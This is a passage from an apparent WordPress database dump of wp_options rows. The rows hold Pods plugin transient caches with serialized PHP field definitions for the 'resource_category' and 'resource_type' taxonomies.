Group\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:5:\"group\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:5:\"count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:5:\"count\";s:5:\"label\";s:5:\"Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}s:9:\"object_id\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"object_id\";s:5:\"label\";s:9:\"Object ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}s:10:\"term_order\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"term_order\";s:5:\"label\";s:10:\"Term Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}}}','off'),(5624453,'_transient_timeout_pods_5030802eb4393e28c2f481fbc9cbcbb2','1782126526','off'),(5624454,'_transient_pods_5030802eb4393e28c2f481fbc9cbcbb2','a:11:{s:7:\"term_id\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"term_id\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:2:{i:0;s:2:\"id\";i:1;s:2:\"ID\";}s:20:\"hide_in_default_form\";b:1;}s:4:\"name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"name\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:5:\"title\";}}s:4:\"slug\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"slug\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:9:\"permalink\";}}s:11:\"description\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"description\";s:5:\"label\";s:11:\"Description\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:8:\"taxonomy\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"taxonomy\";s:5:\"label\";s:8:\"Taxonomy\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}}s:6:\"parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:16:\"term_taxonomy_id\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:16:\"term_taxonomy_id\";s:5:\"label\";s:16:\"Term Taxonomy ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"term_group\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"term_group\";s:5:\"label\";s:10:\"Term Group\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:5:\"group\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:5:\"count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:5:\"count\";s:5:\"label\";s:5:\"Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}s:9:\"object_id\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"object_id\";s:5:\"label\";s:9:\"Object ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}s:10:\"term_order\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"term_order\";s:5:\"label\";s:10:\"Term Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}}','off'),(5624455,'_transient_timeout_pods_3bfbb0c7bebda5ebc13ae03d40bb9b38','1782126526','off'),(5624456,'_transient_pods_3bfbb0c7bebda5ebc13ae03d40bb9b38','a:28:{s:11:\"object_type\";s:8:\"taxonomy\";s:4:\"type\";s:8:\"taxonomy\";s:11:\"object_name\";s:17:\"resource_category\";s:19:\"object_hierarchical\";b:1;s:7:\"storage\";s:4:\"meta\";s:5:\"table\";s:8:\"wp_terms\";s:10:\"meta_table\";s:11:\"wp_termmeta\";s:9:\"pod_table\";s:25:\"wp_pods_resource_category\";s:8:\"field_id\";s:7:\"term_id\";s:11:\"field_index\";s:4:\"name\";s:10:\"field_slug\";s:4:\"slug\";s:10:\"field_type\";s:8:\"taxonomy\";s:12:\"field_parent\";s:6:\"parent\";s:19:\"field_parent_select\";s:13:\"`tt`.`parent`\";s:13:\"meta_field_id\";s:7:\"term_id\";s:16:\"meta_field_index\";s:8:\"meta_key\";s:16:\"meta_field_value\";s:10:\"meta_value\";s:12:\"pod_field_id\";s:2:\"id\";s:15:\"pod_field_index\";s:4:\"name\";s:14:\"pod_field_slug\";N;s:16:\"pod_field_parent\";N;s:4:\"join\";a:2:{s:2:\"tt\";s:70:\"LEFT JOIN `wp_term_taxonomy` AS `tt` ON `tt`.`term_id` = `t`.`term_id`\";s:2:\"tr\";s:94:\"LEFT JOIN `wp_term_relationships` AS `tr` ON `tr`.`term_taxonomy_id` = `tt`.`term_taxonomy_id`\";}s:5:\"where\";a:1:{s:11:\"tt.taxonomy\";s:37:\"`tt`.`taxonomy` = \'resource_category\'\";}s:13:\"where_default\";N;s:7:\"orderby\";s:25:\"`t`.`name`, `t`.`term_id`\";s:3:\"pod\";O:16:\"Pods\\Whatsit\\Pod\":1:{s:7:\"\0*\0args\";a:67:{s:11:\"object_type\";s:3:\"pod\";s:19:\"object_storage_type\";s:9:\"post_type\";s:4:\"name\";s:17:\"resource_category\";s:2:\"id\";i:412;s:6:\"parent\";s:0:\"\";s:5:\"group\";s:0:\"\";s:5:\"label\";s:19:\"Resource Categories\";s:11:\"description\";s:0:\"\";s:6:\"weight\";i:0;s:25:\"_elementor_controls_usage\";a:0:{}s:14:\"label_singular\";s:17:\"Resource Category\";s:6:\"public\";s:1:\"1\";s:7:\"show_ui\";s:1:\"1\";s:12:\"hierarchical\";s:1:\"1\";s:4:\"type\";s:8:\"taxonomy\";s:7:\"storage\";s:4:\"meta\";s:8:\"old_name\";s:17:\"resource_category\";s:7:\"rewrite\";s:1:\"1\";s:18:\"rewrite_with_front\";s:1:\"1\";s:20:\"rewrite_hierarchical\";s:1:\"1\";s:15:\"capability_type\";s:7:\"default\";s:22:\"capability_type_custom\";s:17:\"resource_category\";s:9:\"query_var\";s:1:\"0\";s:4:\"sort\";s:1:\"0\";s:36:\"built_in_post_types_amn_wpforms-lite\";s:1:\"0\";s:30:\"built_in_post_types_custom_css\";s:1:\"0\";s:39:\"built_in_post_types_customize_changeset\";s:1:\"0\";s:32:\"built_in_post_types_elementor-hf\";s:1:\"0\";s:37:\"built_in_post_types_elementor_library\";s:1:\"0\";s:37:\"built_in_post_types_jet-smart-filters\";s:1:\"0\";s:38:\"built_in_post_types_ocean_modal_window\";s:1:\"0\";s:38:\"built_in_post_types_ocean_posts_slider\";s:1:\"0\";s:35:\"built_in_post_types_oceanwp_library\";s:1:\"0\";s:32:\"built_in_post_types_oembed_cache\";s:1:\"0\";s:24:\"built_in_post_types_page\";s:1:\"0\";s:24:\"built_in_post_types_post\";s:1:\"0\";s:32:\"built_in_post_types_user_request\";s:1:\"0\";s:28:\"built_in_post_types_wp_block\";s:1:\"0\";s:27:\"built_in_post_types_wpforms\";s:1:\"0\";s:31:\"built_in_post_types_wpforms_log\";s:1:\"0\";s:30:\"built_in_post_types_attachment\";s:1:\"0\";s:12:\"show_in_menu\";s:1:\"1\";s:13:\"menu_location\";s:7:\"default\";s:13:\"menu_position\";s:1:\"0\";s:17:\"show_in_nav_menus\";s:1:\"1\";s:13:\"show_tagcloud\";s:1:\"1\";s:21:\"show_tagcloud_in_edit\";s:1:\"1\";s:18:\"show_in_quick_edit\";s:1:\"1\";s:17:\"show_admin_column\";s:1:\"0\";s:11:\"pfat_enable\";s:1:\"0\";s:21:\"pfat_run_outside_loop\";s:1:\"0\";s:19:\"pfat_append_archive\";s:6:\"append\";s:11:\"rest_enable\";s:1:\"0\";s:8:\"read_all\";s:1:\"0\";s:9:\"write_all\";s:1:\"0\";s:32:\"built_in_post_types_epa_resource\";s:1:\"1\";s:32:\"built_in_post_types_epa_document\";s:1:\"1\";s:28:\"built_in_post_types_document\";s:1:\"1\";s:33:\"built_in_post_types_news_resource\";s:1:\"1\";s:33:\"built_in_post_types_related_theme\";s:1:\"1\";s:31:\"built_in_post_types_institution\";s:1:\"0\";s:33:\"built_in_post_types_inst_resource\";s:1:\"0\";s:36:\"built_in_post_types_knowledge_broker\";s:1:\"0\";s:36:\"built_in_post_types_project_resource\";s:1:\"0\";s:33:\"built_in_post_types_related_topic\";s:1:\"0\";s:32:\"built_in_post_types_mea_resource\";s:1:\"0\";s:33:\"built_in_post_types_ekms_bulletin\";s:1:\"0\";}}s:7:\"recurse\";b:1;s:13:\"object_fields\";a:11:{s:7:\"term_id\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"term_id\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:2:{i:0;s:2:\"id\";i:1;s:2:\"ID\";}s:20:\"hide_in_default_form\";b:1;}s:4:\"name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"name\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:5:\"title\";}}s:4:\"slug\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"slug\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:9:\"permalink\";}}s:11:\"description\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"description\";s:5:\"label\";s:11:\"Description\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:8:\"taxonomy\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"taxonomy\";s:5:\"label\";s:8:\"Taxonomy\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}}s:6:\"parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:16:\"term_taxonomy_id\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:16:\"term_taxonomy_id\";s:5:\"label\";s:16:\"Term Taxonomy ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"term_group\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"term_group\";s:5:\"label\";s:10:\"Term Group\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:5:\"group\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:5:\"count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:5:\"count\";s:5:\"label\";s:5:\"Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}s:9:\"object_id\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"object_id\";s:5:\"label\";s:9:\"Object ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}s:10:\"term_order\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"term_order\";s:5:\"label\";s:10:\"Term Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}}}','off'),(5624478,'_transient_timeout_pods_18e7ff722aef849c3e2c2667025e1a8f','1782126634','off'),(5624479,'_transient_pods_18e7ff722aef849c3e2c2667025e1a8f','a:28:{s:11:\"object_type\";s:8:\"taxonomy\";s:4:\"type\";s:8:\"taxonomy\";s:11:\"object_name\";s:13:\"resource_type\";s:19:\"object_hierarchical\";b:1;s:7:\"storage\";s:4:\"meta\";s:5:\"table\";s:8:\"wp_terms\";s:10:\"meta_table\";s:11:\"wp_termmeta\";s:9:\"pod_table\";s:21:\"wp_pods_resource_type\";s:8:\"field_id\";s:7:\"term_id\";s:11:\"field_index\";s:4:\"name\";s:10:\"field_slug\";s:4:\"slug\";s:10:\"field_type\";s:8:\"taxonomy\";s:12:\"field_parent\";s:6:\"parent\";s:19:\"field_parent_select\";s:13:\"`tt`.`parent`\";s:13:\"meta_field_id\";s:7:\"term_id\";s:16:\"meta_field_index\";s:8:\"meta_key\";s:16:\"meta_field_value\";s:10:\"meta_value\";s:12:\"pod_field_id\";s:2:\"id\";s:15:\"pod_field_index\";s:4:\"name\";s:14:\"pod_field_slug\";N;s:16:\"pod_field_parent\";N;s:4:\"join\";a:2:{s:2:\"tt\";s:70:\"LEFT JOIN `wp_term_taxonomy` AS `tt` ON `tt`.`term_id` = `t`.`term_id`\";s:2:\"tr\";s:94:\"LEFT JOIN `wp_term_relationships` AS `tr` ON `tr`.`term_taxonomy_id` = `tt`.`term_taxonomy_id`\";}s:5:\"where\";a:1:{s:11:\"tt.taxonomy\";s:33:\"`tt`.`taxonomy` = \'resource_type\'\";}s:13:\"where_default\";N;s:7:\"orderby\";s:25:\"`t`.`name`, `t`.`term_id`\";s:3:\"pod\";O:16:\"Pods\\Whatsit\\Pod\":1:{s:7:\"\0*\0args\";a:65:{s:11:\"object_type\";s:3:\"pod\";s:19:\"object_storage_type\";s:9:\"post_type\";s:4:\"name\";s:13:\"resource_type\";s:2:\"id\";i:465;s:6:\"parent\";s:0:\"\";s:5:\"group\";s:0:\"\";s:5:\"label\";s:14:\"Resource Types\";s:11:\"description\";s:0:\"\";s:6:\"weight\";i:0;s:25:\"_elementor_controls_usage\";a:0:{}s:14:\"label_singular\";s:13:\"Resource Type\";s:6:\"public\";s:1:\"1\";s:7:\"show_ui\";s:1:\"1\";s:12:\"hierarchical\";s:1:\"1\";s:4:\"type\";s:8:\"taxonomy\";s:7:\"storage\";s:4:\"meta\";s:8:\"old_name\";s:13:\"resource_type\";s:7:\"rewrite\";s:1:\"1\";s:18:\"rewrite_with_front\";s:1:\"1\";s:20:\"rewrite_hierarchical\";s:1:\"1\";s:15:\"capability_type\";s:7:\"default\";s:22:\"capability_type_custom\";s:13:\"resource_type\";s:9:\"query_var\";s:1:\"0\";s:4:\"sort\";s:1:\"0\";s:36:\"built_in_post_types_amn_wpforms-lite\";s:1:\"0\";s:30:\"built_in_post_types_custom_css\";s:1:\"0\";s:39:\"built_in_post_types_customize_changeset\";s:1:\"0\";s:28:\"built_in_post_types_document\";s:1:\"1\";s:32:\"built_in_post_types_elementor-hf\";s:1:\"0\";s:37:\"built_in_post_types_elementor_library\";s:1:\"0\";s:37:\"built_in_post_types_jet-smart-filters\";s:1:\"0\";s:33:\"built_in_post_types_news_resource\";s:1:\"1\";s:38:\"built_in_post_types_ocean_modal_window\";s:1:\"0\";s:3